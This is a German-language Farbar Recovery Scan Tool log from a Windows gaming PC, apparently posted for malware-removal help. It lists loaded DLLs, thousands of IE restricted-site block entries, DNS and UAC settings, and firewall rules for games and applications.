2017-07-14 19:07 - 2017-07-12 21:58 - 000028616 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32ts.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000171336 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000042816 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000531264 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000133432 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000224064 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000207680 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000060880 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\win32print.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000054608 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winrpcserver.compiled._RPCServer.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.user32.compiled._winffi_user32.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000069968 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022872 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.iphlpapi.compiled._winffi_iphlpapi.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000021848 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.winerror.compiled._winffi_winerror.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022872 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.wininet.compiled._winffi_wininet.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000349128 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000103232 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtWinExtras.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000023896 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000025936 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000036296 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\librsync.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 000033112 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2017-07-14 19:07 - 2017-07-12 21:58 - 000293392 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 000181056 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2017-07-14 19:07 - 2017-07-12 22:01 - 000030536 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\wind3d11.compiled._wind3d11.pyd
2017-07-14 19:07 - 2017-07-12 21:59 - 000024368 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libEGL.dll
2017-07-14 19:07 - 2017-07-12 21:59 - 001637688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2017-07-14 19:07 - 2017-07-12 22:01 - 000026456 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.winhttp.compiled._winffi_winhttp.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000022864 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\winffi.shcore.compiled._winffi_shcore.pyd
2017-07-14 19:07 - 2017-07-12 22:01 - 000023368 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\wincrashpad.compiled._Crashpad.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000546104 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2017-07-14 19:07 - 2017-07-12 22:00 - 000357688 _____ () C:\Users\*****\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2017-04-19 23:18 - 2017-04-19 23:18 - 067725936 _____ () C:\Users\*****\AppData\Roaming\Spotify\libcef.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000110192 _____ () C:\Users\*****\AppData\Roaming\Spotify\SpotifyWinRT.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 001929840 _____ () C:\Users\*****\AppData\Roaming\Spotify\libglesv2.dll
2017-04-19 23:18 - 2017-04-19 23:18 - 000087152 _____ () C:\Users\*****\AppData\Roaming\Spotify\libegl.dll
2017-07-02 14:53 - 2017-06-20 16:59 - 022908928 _____ () G:\Program Files (x86)\The Elder Scrolls Online\Launcher\libcef.dll
2017-03-13 19:39 - 2016-05-23 22:49 - 000899872 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\webres.dll
2017-03-13 19:39 - 2016-10-18 17:57 - 000631072 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\ProductStatistics.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.

IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\008k.com -> 008k.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\00hq.com -> 00hq.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\0190-dialers.com -> 0190-dialers.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\01i.info -> 01i.info
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\05p.com -> 05p.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\0calories.net -> 0calories.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\0cj.net -> 0cj.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\0scan.com -> 0scan.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\1-domains-registrations.com -> 1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\1-se.com -> 1-se.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\1001movie.com -> 1001movie.com
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\1001night.biz -> 1001night.biz
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\100gal.net -> 100gal.net
IE restricted site: HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\100sexlinks.com -> 100sexlinks.com

Da befinden sich 4789 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2013-08-22 15:25 - 2013-08-22 15:25 - 000000824 _____ C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
HKU\S-1-5-21-1566530412-1856523912-1524002813-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Control Panel\Desktop\\Wallpaper -> C:\Users\*****\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\fantasy.jpg
DNS Servers: 62.2.24.162 - 62.2.17.61
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

MSCONFIG\Services: PDF Architect 5 Manager => 2
HKLM\...\StartupApproved\Run32: => "UpdReg"
HKLM\...\StartupApproved\Run32: => "Raptr"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{A48CA470-A870-4179-B1B2-4E1B515CF8CC}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [{15C73935-9422-4FF2-8044-5909C2A58895}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\XCOM 2\Binaries\Win64\Launcher\ModLauncherWPF.exe
FirewallRules: [UDP Query User{9EE745C2-5DD7-43D6-AC1A-F4CB56837C77}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [TCP Query User{7CDC35E1-0481-4B34-B7A2-07A7BF9EA6B4}C:\program files\logitech gaming software\lcore.exe] => (Allow) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{02439386-6E1B-4B1A-85CE-2BAEDC630B7D}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [TCP Query User{21237B05-7282-4B4E-A1B9-166036A3F782}G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe] => (Allow) G:\program files (x86)\myphoneexplorer\myphoneexplorer.exe
FirewallRules: [{BDE3FBE0-1EB1-483E-95ED-69A353C856D3}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DyingLightGame.exe
FirewallRules: [{91B18C99-C09D-431D-9942-1E8FF120D11F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Dying Light\DyingLightGame.exe
FirewallRules: [UDP Query User{DF239A90-3015-4A02-9683-656B9FF43E4E}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [TCP Query User{ACCBBD61-2F9E-4EB0-85D4-5BA97DE3FBCF}G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\eve online\sharedcache\tq\bin\exefile.exe
FirewallRules: [{0D1B9AD2-C22B-49E0-A70F-ACB9065E4C01}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [{E0EEBF19-98E6-42DE-BFD5-648FE1CAC4EA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Eve Online\eve.exe
FirewallRules: [UDP Query User{A99BD097-FB9C-4197-B13A-5C40B5146AE9}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [TCP Query User{2AAE67D8-35FC-4732-ACEC-7220F4914FE7}G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\total war warhammer\warhammer.exe
FirewallRules: [{14474F9C-03AD-4494-B15F-0C40BBA1049E}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
FirewallRules: [{ADCF6E91-1091-4881-B439-BBC1A337404C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Batman Arkham City GOTY\Binaries\Win32\BatmanAC.exe
FirewallRules: [UDP Query User{E7165155-1031-43E7-9F56-B39F3081C3FC}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [TCP Query User{015D5357-1B6C-4BB6-8E04-A92E4DEE27D8}F:\program files (x86)\forhonor\forhonor.exe] => (Allow) F:\program files (x86)\forhonor\forhonor.exe
FirewallRules: [{9D819DCB-2F2A-4F0C-8B4E-BAF745DDCDAA}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{6AD5DAF0-AD0C-4397-80FB-784D39972676}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Galactic Civilizations III\StardockLauncher.exe
FirewallRules: [{BC6EB3F3-2A98-46F0-9150-BCC21E2A56E7}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F69BB511-8722-4AC1-826A-17EF9DF0BC0E}] => (Allow) G:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{B4593F94-2FA0-4595-B476-E2B14AA8F5C2}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{4C81C009-BCAE-43D4-9498-8EAE2B0A4C6A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Tyranny\Tyranny.exe
FirewallRules: [{310A94E6-73AC-4ED9-B2FC-0B186AB40DE6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{B32AAF55-10AB-4914-B9AE-52159DE5512C}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{B09ADEED-B680-4B72-900B-77D2C4F2650F}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\binaries\vermintide.exe
FirewallRules: [{49966F41-9BFA-48F3-A63D-8FACAF2E5036}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{2FC5A6BD-BF05-4164-89C1-16FE7BF2BAE1}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Warhammer End Times Vermintide\launcher\launcher.exe
FirewallRules: [{C2397ABC-794C-40AF-A15E-DA816A4EC318}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [{B1052126-2905-42E2-956D-850CCD9C1014}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Rise of the Tomb Raider\ROTTR.exe
FirewallRules: [UDP Query User{0FF06ECA-E1F0-41B0-8FCD-126D174715D0}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [TCP Query User{6928C914-94B4-4F89-99D1-4AA5BBD06AFC}G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe] => (Allow) G:\program files (x86)\steam\steamapps\common\elite dangerous\products\elite-dangerous-64\elitedangerous64.exe
FirewallRules: [UDP Query User{98FBAFC3-976A-4164-813B-40F32032BBDF}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [TCP Query User{8030943B-531A-4F01-9F2A-FF946F4B1285}G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe] => (Allow) G:\program files (x86)\hi-rez studios\hirezgames\smite\binaries\win32\smite.exe
FirewallRules: [UDP Query User{54BD8357-54B2-4494-9854-D8EDB5EC5113}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{BA245DA0-2241-46ED-8F5B-6B4A4A9FF1F7}C:\users\*****\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\*****\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{2B51C0D6-D4E8-4CC0-8271-F4A911C2F406}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{437D4E9B-EC49-4CF6-8CD2-921830F6564C}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [{39430812-9852-49ED-9F86-904CB000274A}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{7376B877-0383-44F7-909E-07F9D738AFA7}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{22067E9A-32F2-40FF-AC7A-01F94C55642C}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{8D47AC7F-25CB-4C41-A7BA-EF713FCE93CF}] => (Allow) G:\Games\World_of_Warships\WoWSLauncher.exe
FirewallRules: [{A7EEE726-FE30-4C66-8AD5-93D5C3C96B07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{87C53834-94A0-4EEA-B4F5-6311177D9A07}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Elite Dangerous\EDLaunch.exe
FirewallRules: [{EC5D9F1C-0712-4115-82E5-8A4DFB287171}] => (Allow) G:\Program Files (x86)\Origin Games\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{AB4BC1BF-E0E1-484B-85BB-BE6D456834A0}] => (Allow) G:\Program Files (x86)\Origin Games\Command and Conquer Red Alert II\RA2Launcher.exe
FirewallRules: [{EA9F2049-950D-439D-85B9-02D649D73245}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{247328BE-4699-4A3F-A6CA-661592F926AF}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{DD07B558-9E11-4AAD-9B6D-7B75E3B4B53B}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{F4996C83-AA13-4703-B61B-4A89884F8B90}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{679B2599-B113-4728-B3FA-84E705F0BBDD}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{96341DDC-B74C-4FDE-A455-66A4B4835DF6}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{6818289E-239B-49EE-B001-FB69A2E6A8C0}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{F0859AC3-60E3-4D00-B630-170BF1C441E5}] => (Allow) G:\Program Files (x86)\Funcom\The Secret World\ClientPatcher.exe
FirewallRules: [{B515A77B-C22A-4D35-957F-4BC619063FF5}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{42C09225-0BCA-4B7A-A912-874BA402CA17}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Wolfenstein.The.New.Order.DE\WolfNewOrder_x64.exe
FirewallRules: [{4F1029AB-0FBD-45F8-9898-689A2D6F9BAC}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{679F21A3-8A59-45B3-8C1E-EFE5E0710C63}] => (Allow) G:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [TCP Query User{FB088684-BBC4-4D8B-BBAF-5842DA9EE196}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{2A8CE33E-EC98-4518-B46D-42E1DEA51F46}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
FirewallRules: [{4D766A26-785C-455E-B90F-F910A14E7B7F}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [{451F15F9-2D6B-46B6-ACB5-710CD2226BDD}] => (Allow) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
FirewallRules: [TCP Query User{37632275-71A2-49D8-A0FA-70CCB7875F1E}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [UDP Query User{2314FC4F-415A-4DF3-AA49-81CFB9ACE68A}F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe] => (Allow) F:\program files (x86)\turbine\der herr der ringe online\lotroclient.exe
FirewallRules: [TCP Query User{DA695000-4AF9-41AF-9754-C8FA4C6954C1}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{8D614418-EAB5-437D-8C47-BA5ACE131844}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{A397AF39-676F-4717-8C88-59C336141F49}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{E5A7347B-77B2-483E-8FE8-4CAA8722A8D3}C:\program files (x86)\skype\phone\skype.exe] => (Block) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [TCP Query User{7409D24F-3B4B-47E4-91B8-98CDC53334D0}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{4B5DB8A4-B9FF-49E3-A8CF-8F2DDDB8F35E}C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\*****\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [{2AA5D29E-9956-4801-89E0-314D5D360729}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{D76C6855-9A37-4F88-9DD6-996F46A272C4}] => (Allow) G:\Program Files (x86)\Steam\steamapps\common\Fallout New Vegas\FalloutNVLauncher.exe
FirewallRules: [{F723C80F-371B-4A95-8F54-FA07E9E42973}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{3059C505-B8D3-418B-AC08-C874D15FA7DE}] => (Allow) G:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [TCP Query User{3C48B5B3-18E3-4B84-A540-634DC83BA8B8}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [UDP Query User{B8D0287B-F1FE-4955-A6F8-D589CB7A01F5}G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe] => (Allow) G:\program files (x86)\the elder scrolls online\launcher\bethesda.net_launcher.exe
FirewallRules: [{DB86E705-4890-40A5-853E-1F2EEC9DD046}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [{C497194B-F1B8-4616-B08F-6951EFC5E468}] => (Allow) G:\Program Files (x86)\Origin Games\Dragon Age Inquisition\DragonAgeInquisition.exe
FirewallRules: [TCP Query User{410E0639-1031-468E-8C0C-9B488EDB7278}C:\users\*****\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\*****\appdata\local\akamai\netsession_win.exe
